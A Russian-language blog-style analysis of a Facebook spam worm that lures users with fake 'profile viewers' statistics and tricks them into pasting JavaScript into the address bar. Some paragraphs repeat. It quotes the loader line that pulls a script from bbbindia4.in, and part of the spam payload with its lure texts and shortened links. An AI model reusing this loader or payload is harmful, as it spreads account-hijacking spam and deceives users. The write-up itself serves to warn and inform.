Сегодня в Фейсбуке пошла волна спама с темой «How to see who viewed your profile!!». Распространяется тремя путями:
Цель всех трех способов — загнать атакуемого пользователя на сайт http://iamnewc.blogspot.com/, который прячется за сокращалкой урлов GoDaddy x.co по адресу http://x.co/WlL4/?$PARAM, где $PARAM — некое число, видимо, ассоциированное с юзером фейсбука, чтобы понимать, кто клюнул.
Дальнейшее напоминает метод социальной инженерии, использованный в еще одной недавней нашумевшей фишинг-атаке на пользователей Фейсбук: предлагают скопировать JavaScript-код в буфер обмена, перейти на Facebook и исполнить его (вставив в адресную строку и нажав Enter):
А уж с этой странички (http://bbbindia4.in/jsp.php), в свою очередь, грузится и исполняется:
Update Упомянутые в последнем фрагменте урлы, сокращенные с x.co уже не работают; возможно, удалены службой безопасности GoDaddy. А вот на www.gameindiagame.blogspot.com можно зайти хотя бы для того, чтобы полюбоваться надписью Facebook Verification Spam Bot :). Естественно, заходить лучше в инкогнито-режиме.
- IM-сообщения, если атакуемый пользователь онлайн
- Теггинг пользователей в посте со статистикой просмотра инфицированного пользователя (естественно, статистика липовая, в духе печально известных в Рунете скамов «Прочитай чужие смски» и «Посмотри историю перемещений юзера»
- Приглашение на мероприятие (event).
Цель всех трех способов — загнать атакуемого пользователя на сайт http://iamnewc.blogspot.com/, который прячется за сокращалкой урлов GoDaddy x.co по адресу http://x.co/WlL4/?$PARAM, где $PARAM — некое число, видимо, ассоциированное с юзером фейсбука, чтобы понимать, кто клюнул.
Дальнейшее напоминает метод социальной инженерии, использованный в еще одной недавней нашумевшей фишинг-атаке на пользователей Фейсбук: предлагают скопировать JavaScript-код в буфер обмена, перейти на Facebook и исполнить его (вставив в адресную строку и нажав Enter):
javascript:(a=(b=document).createElement('script')).src='// bbbindia4.in/jsp.php',b.body.appendChild(a);void(0)
А уж с этой странички (http://bbbindia4.in/jsp.php), в свою очередь, грузится и исполняется:
var randomnumber=Math.floor(Math.random()*99999); var randomnumber1=Math.floor(Math.random()*987); var randomnumber2=Math.floor(Math.random()*754); var randomnumber3=Math.floor(Math.random()*43); var randomnumber4=Math.floor(Math.random()*9); var random=Math.floor(Math.random()*5); if (random == 1) { var url = ' x.co/WleP?' } else if (random == 2) { var url = 'http://x.co/WleV/?' } else if (random == 3) { var url = 'http://x.co/Wled/?' } else if (random == 4) { var url = 'http://x.co/Wlek/?' } else { var url = 'http://x.co/Wlem/?' } var message = '%firstname% See who views your profile '; var ev = 'check out this new facebook feature! \x0A see your profile view results by copying and pasting the link below in the address bar \x0A '; var test = 'My Top Profile Viewers Are:\x0A'; var id = '%tf% - ' + randomnumber1 + ' views,\x0A'; var id1 = '%tf% - ' + randomnumber2 + ' views,\x0A'; var id2 = '%tf% - ' + randomnumber3 + ' views,\x0A'; var id3 = '%tf% - ' + randomnumber4 + ' views,\x0A'; var post = ' see who viewed your facebook profile @ '; var postmessage = test + id + id1 + id2 + id3 + post + url + randomnumber; var chatmessage = message + url + randomnumber; var redirect = 'http:// www.gameindiagame.blogspot.com'; var eventdesc = ev + url + randomnumber; var eventname = 'How to see who viewed your profile!!'; var nfriends = 5000; //
Update Упомянутые в последнем фрагменте урлы, сокращенные с x.co уже не работают; возможно, удалены службой безопасности GoDaddy. А вот на www.gameindiagame.blogspot.com можно зайти хотя бы для того, чтобы полюбоваться надписью Facebook Verification Spam Bot :). Естественно, заходить лучше в инкогнито-режиме.